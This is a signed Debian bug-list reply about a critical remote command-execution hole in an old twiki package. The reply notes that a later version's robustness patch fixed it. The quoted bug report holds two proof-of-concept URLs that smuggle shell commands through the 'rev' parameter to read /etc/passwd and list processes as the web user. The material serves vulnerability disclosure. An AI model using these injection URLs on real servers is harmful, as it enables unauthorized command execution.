-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 why are you running a totally outdated twiki package?
http://packages.debian.org/unstable/web/twiki only lists 20040902-3, in which this problem has been solved using the robustness patch from Florian Weimer <[EMAIL PROTECTED]> Cheers Sven Paul Szabo wrote: > Package: twiki > Version: 20030201-6 > Severity: critical > Justification: root security hole > > > > Please see > > http://www.securityfocus.com/archive/1/410721 > > Verified with > > http://iw/iw/view/Main/TWikiUsers?rev=3D2%20%7Cless%20/etc/passwd > http://iw/iw/view/Main/TWikiUsers?rev=3D2%20%7Cps%20aux|cat%20--%20-%20 > > that it allows access as www-data, the apache user. > > > -- System Information: > Debian Release: 3.1 > Architecture: i386 (i686) > Kernel: Linux 2.6.8-spb0.3 > Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) > > Versions of packages twiki depends on: > ii apache-common 1.3.33-6sarge1 support files for all Apache > webse > ii debconf 1.4.30.13 Debian configuration management > sy > ii libalgorithm-diff-perl 1.19.01-1 a perl library for finding > Longest > ii libdigest-sha1-perl 2.10-1 NIST SHA-1 message digest > algorith > ii perl [libmime-base64-perl 5.8.4-8 Larry Wall's Practical > Extraction > ii perl-modules [libnet-perl 5.8.4-8 Core Perl modules > ii rcs 5.7-15 The GNU Revision Control System > > -- debconf information: > * twiki/apacheUserCreationNote: > * twiki/samplefiles: true > * twiki/wikiwebmaster: [EMAIL PROTECTED] > * twiki/defaultUrlHost: http://iw.maths.usyd.edu.au > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFDKmRfPAwzu0QrW+kRAlMHAJ9r/z9dB6ELkPj6EQUHLJS6oL40qQCeJ5e0 PuKnTxvjj4AXYf4lf4TOqJQ= =/GKD -----END PGP SIGNATURE----- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
